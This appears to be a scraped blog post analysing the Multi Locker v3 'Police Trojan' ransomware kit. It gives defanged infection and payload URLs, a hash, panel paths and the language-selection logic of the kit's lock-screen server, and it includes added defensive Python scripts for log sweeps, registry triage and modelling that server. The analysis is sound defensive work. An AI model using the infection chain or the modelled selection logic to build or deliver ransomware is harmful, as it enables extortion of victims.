<a href="http://4.bp.blogspot.com/-8EjJBbu8gEU/UOrhIbW0_9I/AAAAAAAAAXs/AsDlJLKzlyI/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://4.bp.blogspot.com/-8EjJBbu8gEU/UOrhIbW0_9I/AAAAAAAAAXs/AsDlJLKzlyI/s400/3.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The KIT file structure is as follows:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WB_Stwho5Kc/UOrhPogvVvI/AAAAAAAAAX0/65bZZoma-J4/s1600/kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://1.bp.blogspot.com/-WB_Stwho5Kc/UOrhPogvVvI/AAAAAAAAAX0/65bZZoma-J4/s400/kit.jpg" width="400" /></a></div>
<span lang="en">Installation of the panel kit:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-M4i9HZu0WRE/UOrhX83sDII/AAAAAAAAAX8/Z-nk1Uj9C4U/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="381" src="http://2.bp.blogspot.com/-M4i9HZu0WRE/UOrhX83sDII/AAAAAAAAAX8/Z-nk1Uj9C4U/s400/4.jpg" width="400" /></a></div>
</div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-66159647246447616432013-01-07T06:54:00.000-08:002013-01-07T06:54:10.370-08:00 Police Trojan Multi Locker Version 3<div class="separator" style="clear: both; text-align: center;">
</div>
<!--[if gte mso 9]><xml>
</xml><![endif]--><!--[if gte mso 9]><xml>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if !mso]><img src="//img2.blogblog.com/img/video_object.png" style="background-color: #b2b2b2; " class="BLOGGER-object-element tr_noresize tr_placeholder" id="ieooui" data-original-id="ieooui" />
<style>
st1\:*{behavior:url(#ieooui) }
</style>
<![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Tabla normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";}
</style>
<![endif]-->
<br />
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Recently there has been a marked increase in infections by the ransomware trojan also known as Ransomlock or Multi Locker, and more commonly as the "Police Trojan", because it pretends that the computer has been seized and locked by the police until a legal penalty fee is paid. That fee is nothing more than a fraud run by the criminals.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">This time we will analyse the MULTI LOCKER trojan kit, version 3.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">The user's machine is compromised when it visits the infection vector:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hxxp://62.76.45.94/exe.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">which downloads the malicious binary:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hxxp://62.76.45.94/colt.exe</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Size: 7680 bytes</span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">MD5: baa5de00714b02660bfc092b53c449f7</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">The IP 62.76.45.94 is hosted at the Russian ISP Clodo-Cloud.</span></div>
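<div class="MsoNormal">
The indicators in this post (the host 62.76.45.94 and the paths /exe.php, /colt.exe, /lending/tds.php, /lending/ES.php and /lending/) are the kind of thing a defender sweeps proxy logs for. The script below is an added example, not part of the original post and not the kit's code: it walks Squid native-format access.log lines, maps each hit to its stage in the infection chain and rates it by whether the request actually completed. The log format choice and the sample lines are constructed for illustration.
</div>

```python
"""Sweep web-proxy logs for the Multi Locker infrastructure named in the post.

Added example (not from the post). Indicators are the ones the post lists;
the Squid native log format and the sample lines below are constructed.
"""
import re
from urllib.parse import urlsplit

IOC_HOST = "62.76.45.94"
# Stage each path plays in the infection chain described in the post.
IOC_PATHS = {
    "/exe.php": "infection vector (exploit page)",
    "/colt.exe": "payload download",
    "/lending/tds.php": "TDS, language check for lock screen",
    "/lending/ES.php": "Spanish lock screen",
    "/lending/": "lending editor / panel (operator access)",
}

# Squid native format: ts elapsed client code/status bytes method URL user hier/peer type
_SQUID_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+\d+\s+(?P<client>\S+)\s+(?P<status>\S+)\s+(?P<bytes>\d+)\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)


def classify_url(url):
    """Return (stage, severity) if the URL touches the kit host, else None."""
    parts = urlsplit(url)
    if (parts.hostname or "") != IOC_HOST:
        return None
    path = parts.path or "/"
    stage = IOC_PATHS.get(path, "other request to kit host")
    # A fetch of the dropper is the strongest signal the host ran the payload.
    severity = "high" if path == "/colt.exe" else "medium"
    return stage, severity


def sweep(log_text):
    """Return one dict per log line that reached the kit host."""
    hits = []
    for line in log_text.splitlines():
        m = _SQUID_RE.match(line)
        if not m:
            continue
        verdict = classify_url(m["url"])
        if verdict is None:
            continue
        stage, severity = verdict
        # Only a .../200 with a body means the content actually reached the client;
        # a TCP_DENIED or a zero-byte reply is a blocked attempt, not an infection.
        completed = m["status"].endswith("/200") and int(m["bytes"]) > 0
        hits.append({
            "client": m["client"], "url": m["url"], "stage": stage,
            "severity": severity if completed else "low",
        })
    return hits


def infected_clients(hits):
    """Clients that completed the payload download and need host triage."""
    return sorted({h["client"] for h in hits
                   if h["stage"] == "payload download" and h["severity"] == "high"})


# Constructed sample log (Squid native format): one full chain, one blocked fetch, one benign line.
SAMPLE_LOG = """\
1356500001.123    512 10.0.0.5 TCP_MISS/200 3021 GET http://62.76.45.94/exe.php - DIRECT/62.76.45.94 text/html
1356500002.456    804 10.0.0.5 TCP_MISS/200 7680 GET http://62.76.45.94/colt.exe - DIRECT/62.76.45.94 application/octet-stream
1356500003.789    120 10.0.0.5 TCP_MISS/200 2210 GET http://62.76.45.94/lending/tds.php - DIRECT/62.76.45.94 text/html
1356500004.000     90 10.0.0.5 TCP_MISS/200 9812 GET http://62.76.45.94/lending/ES.php - DIRECT/62.76.45.94 text/html
1356500005.000     40 10.0.0.9 TCP_DENIED/403 0 GET http://62.76.45.94/colt.exe - NONE/- text/html
1356500006.000     30 10.0.0.7 TCP_MISS/200 5120 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html
"""

if __name__ == "__main__":
    results = sweep(SAMPLE_LOG)
    for h in results:
        print(f"{h['severity']:6} {h['client']:10} {h['stage']:45} {h['url']}")
    print("infected:", infected_clients(results))
```

<div class="MsoNormal">
Matching on the host rather than the full URL is deliberate: the kit's paths are trivially renamed, while the server stays put for as long as the hosting holds. Completed downloads of the dropper are what drive host triage; a blocked or empty fetch is still worth a ticket, but as an attempted infection.
</div>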
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Once the machine is infected, the malware rewrites the system configuration and the registry so that every time the user reboots, the trojan automatically regains control and locks the whole system, while displaying the fake police screen demanding payment of a fine for having supposedly visited illegal content (child pornography or intellectual-property infringement).</span></div>
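<div class="MsoNormal">
The post does not say which registry values this sample rewrites to regain control at boot. The script below is an added example, not the kit's code and not from the post: it parses the text output of <code>reg query &lt;key&gt; /s</code> for the autostart locations screen lockers usually hijack (the Winlogon Shell and Userinit values and the Run keys) and flags a replaced shell or a Run entry launching from a user-writable directory. The key list and known-good values are assumptions for illustration, and the sample query output is constructed.
</div>

```python
"""Triage of the autostart locations a screen locker typically hijacks.

Added example, not from the post. The post says the trojan rewrites system
configuration and registry to regain control at every reboot but not which
keys; Winlogon Shell/Userinit and the Run keys are the usual suspects and are
an assumption here. SAMPLE is constructed `reg query ... /s` output.
"""
import re

# Known-good Windows defaults (assumed). Compared case-insensitively, tolerating
# the trailing comma Userinit carries and any surrounding quotes.
EXPECTED = {
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon": {
        "Shell": {"explorer.exe"},
        "Userinit": {r"c:\windows\system32\userinit.exe"},
    },
}
RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
)
# Directories a dropper fetched by a browser exploit usually lands in.
SUSPICIOUS_DIRS = ("\\temp\\", "\\appdata\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")

# One value line of `reg query` output: indent, name, type, data (data may be empty).
_VALUE_RE = re.compile(r"^\s+(\S.*?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")


def parse_reg_query(text):
    """Parse `reg query <key> /s` output into {key: {value_name: data}}."""
    tree, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("HKEY_"):          # key header lines are not indented
            current = line.strip()
            tree.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, _type, data = m.groups()
            tree[current][name] = data.strip()
    return tree


def _norm(value):
    return value.strip().rstrip(",").strip('"').lower()


def find_locker_persistence(text):
    """Return (key, value_name, data, reason) for each suspicious autostart entry."""
    findings = []
    tree = parse_reg_query(text)
    for key, expected in EXPECTED.items():
        for name, good in expected.items():
            data = tree.get(key, {}).get(name)
            if data is not None and _norm(data) not in good:
                findings.append((key, name, data, f"{name} replaced (expected {sorted(good)[0]})"))
    for key in RUN_KEYS:
        for name, data in tree.get(key, {}).items():
            if any(d in data.lower() for d in SUSPICIOUS_DIRS):
                findings.append((key, name, data, "Run entry launches from a user-writable directory"))
    return findings


# Constructed sample: what an infected host's query might look like. Shell has been
# swapped for the dropper and a Run entry points at the same file in %TEMP%.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell    REG_SZ    C:\Users\victim\AppData\Local\Temp\colt.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    colt    REG_SZ    C:\Users\victim\AppData\Local\Temp\colt.exe
"""

if __name__ == "__main__":
    for key, name, data, reason in find_locker_persistence(SAMPLE):
        print(f"[!] {reason}\n    {key}\\{name} = {data}")
```

<div class="MsoNormal">
Run the query from a clean boot medium or over a remote shell when possible, since a locker that has replaced Shell owns the interactive session. Restoring Shell to explorer.exe and removing the Run entry breaks the lock, but the dropper itself still has to be removed and the exploit that delivered it patched.
</div>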
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">This fake screen is downloaded from the fraudulent server at:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hxxp://62.76.45.94/lending/tds.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">which checks the language of the user's browser so that the fake screen is shown in the user's language, with the legal notices and police-force branding of that country.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">The code of the TDS.php script is as follows:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oR8gTtFTWdA/UOrecrjMjZI/AAAAAAAAAWk/Z_6aPn7i7ng/s1600/tds.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-oR8gTtFTWdA/UOrecrjMjZI/AAAAAAAAAWk/Z_6aPn7i7ng/s640/tds.jpg" width="475" /></a></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span></div>
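<div class="MsoNormal">
The only thing a TDS of this kind can see is the browser's Accept-Language header, which is also what lets an analyst pull every lock screen it serves by replaying that header. The code below is an added example, not the kit's tds.php (the post only shows a screenshot of it): it models the behaviour the post describes, parsing Accept-Language with its q-weights and returning the country page, with permissive handling of malformed elements. Only ES.php is confirmed by the post; the other landing names and the fallback page are assumptions.
</div>

```python
"""Model of a language-keyed TDS such as the kit's tds.php.

Added example, not the kit's code. Reimplements the behaviour the post
describes: read Accept-Language, hand back the lock screen for that country.
Landing pages other than ES.php and the fallback are assumptions.
"""
import re

# Landing pages the kit is assumed to carry; only ES.php is confirmed by the post.
LANDINGS = {"es": "ES.php", "de": "DE.php", "fr": "FR.php", "it": "IT.php", "en": "GB.php"}
DEFAULT_LANDING = "GB.php"  # assumed fallback when nothing matches

# One Accept-Language element: language-range, optional ;q=weight (RFC 7231 5.3.5).
_ELEMENT_RE = re.compile(
    r"^\s*(\*|[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*)\s*(?:;\s*q\s*=\s*(\d(?:\.\d{0,3})?))?\s*$"
)


def parse_accept_language(header):
    """Return [(tag, q)] ordered by descending q, header order on ties.

    Malformed elements are skipped and q=0 elements dropped: a TDS that
    errors on a bad header loses the victim, so permissive parsing is what
    such kits do in practice.
    """
    ranked = []
    for pos, element in enumerate(header.split(",")):
        m = _ELEMENT_RE.match(element)
        if not m:
            continue
        tag = m.group(1).lower()
        q = float(m.group(2)) if m.group(2) is not None else 1.0
        if q > 0:
            ranked.append((-q, pos, tag, q))
    ranked.sort()
    return [(tag, q) for _, _, tag, q in ranked]


def select_landing(header, landings=LANDINGS, default=DEFAULT_LANDING):
    """Pick the lock screen: first acceptable primary language we have a page for."""
    for tag, _ in parse_accept_language(header or ""):
        primary = tag.split("-", 1)[0]
        if primary in landings:
            return landings[primary]
    return default


def replay_headers(landings=LANDINGS):
    """Accept-Language values an analyst sends to pull every landing the TDS serves."""
    return {lang: f"{lang},{lang};q=0.9" for lang in landings}


if __name__ == "__main__":
    for hdr in ("es-ES,es;q=0.8,en;q=0.5", "de;q=0.7,fr;q=0.9", "ja,ko;q=0.8", ""):
        print(f"{hdr!r:32} -> {select_landing(hdr)}")
```

<div class="MsoNormal">
Because the selection is driven purely by a client-supplied header, the same trick works defensively: a sandbox or crawler can iterate over <code>replay_headers()</code> and archive every localised lock screen for attribution and signature work without needing to infect a host per country.
</div>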
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">For Spanish users it would show the following fraudulent screen, hosted at:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hxxp://62.76.45.94/lending/ES.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FU8qIHKDxUo/UOre0F0JZcI/AAAAAAAAAWs/INFF3Jn-e4g/s1600/police.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://3.bp.blogspot.com/-FU8qIHKDxUo/UOre0F0JZcI/AAAAAAAAAWs/INFF3Jn-e4g/s400/police.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">In this case the screen is rather poorly designed, unlike other kits we have seen whose screens are far more detailed and do manage to convince the user that they are genuine.</span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">The criminals can edit the warning pages to give them an air of legitimacy through the mini editor built into the ransomware kit (which some antivirus vendors also call Ransomlock).</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">The panel is called MULTI LOCKER LENDING EDITOR and is accessed via the URL:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hxxp://62.76.45.94/lending/</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NXrO9kPRgQI/UOre-l4bB4I/AAAAAAAAAW0/sSHDs6gD0g0/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://1.bp.blogspot.com/-NXrO9kPRgQI/UOre-l4bB4I/AAAAAAAAAW0/sSHDs6gD0g0/s400/login.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">And the kit's file structure:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-tD3DDKIMkxU/UOrfJiMT13I/AAAAAAAAAW8/xdus2Kaxei0/s1600/mutilocker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-tD3DDKIMkxU/UOrfJiMT13I/AAAAAAAAAW8/xdus2Kaxei0/s640/mutilocker.jpg" width="488" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">If the user pays the fee through online payment services such as Ukash or MoneyPak, the machine is unlocked once the voucher code issued by those services is entered.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-VdYoO8njfGI/UOrfj7iYl3I/AAAAAAAAAXE/Rv07xw_tozU/s1600/unlock.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="71" src="http://3.bp.blogspot.com/-VdYoO8njfGI/UOrfj7iYl3I/AAAAAAAAAXE/Rv07xw_tozU/s400/unlock.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-KqrJ2L6gWCM/UOrfpMmlCXI/AAAAAAAAAXM/I3ZTAnhJX7I/s1600/unlock-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="http://2.bp.blogspot.com/-KqrJ2L6gWCM/UOrfpMmlCXI/AAAAAAAAAXM/I3ZTAnhJX7I/s400/unlock-2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">The ransomware's statistics panel is reached through the main login page:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-C9u5zIyA5Do/UOrfwC5QyTI/AAAAAAAAAXU/I6FqhwZyrro/s1600/login2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="http://2.bp.blogspot.com/-C9u5zIyA5Do/UOrfwC5QyTI/AAAAAAAAAXU/I6FqhwZyrro/s400/login2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Once logged in, the main menu screen of the MULTI LOCKER KIT Version 3 appears.</span><br />
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-AXNh0DA-7g8/UOrf6dg7scI/AAAAAAAAAXc/vrOxnrSQQBI/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="http://4.bp.blogspot.com/-AXNh0DA-7g8/UOrf6dg7scI/AAAAAAAAAXc/vrOxnrSQQBI/s400/2.jpg" width="400" /></a></div>
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span><br />
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">With its statistics menu of infected users:</span><br />
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-cnKoAQUqwWk/UOrgngINuQI/AAAAAAAAAXk/3BvZ-Wq9bJk/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="http://1.bp.blogspot.com/-cnKoAQUqwWk/UOrgngINuQI/AAAAAAAAAXk/3BvZ-Wq9bJk/s400/1.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
</div>
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">And the tracking menu for users who have paid to unlock their machine:</span><br />
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-8EjJBbu8gEU/UOrhIbW0_9I/AAAAAAAAAXs/AsDlJLKzlyI/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://4.bp.blogspot.com/-8EjJBbu8gEU/UOrhIbW0_9I/AAAAAAAAAXs/AsDlJLKzlyI/s400/3.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span><span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">The file structure of the kit is as follows:</span>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WB_Stwho5Kc/UOrhPogvVvI/AAAAAAAAAX0/65bZZoma-J4/s1600/kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://1.bp.blogspot.com/-WB_Stwho5Kc/UOrhPogvVvI/AAAAAAAAAX0/65bZZoma-J4/s400/kit.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Its installation panel:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-M4i9HZu0WRE/UOrhX83sDII/AAAAAAAAAX8/Z-nk1Uj9C4U/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="381" src="http://2.bp.blogspot.com/-M4i9HZu0WRE/UOrhX83sDII/AAAAAAAAAX8/Z-nk1Uj9C4U/s400/4.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-84903424756615641042012-12-26T03:51:00.000-08:002012-12-26T03:51:26.275-08:00Phishing Criminal Infraestructure<!--[if gte mso 9]><xml>
</xml><![endif]--><br />
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
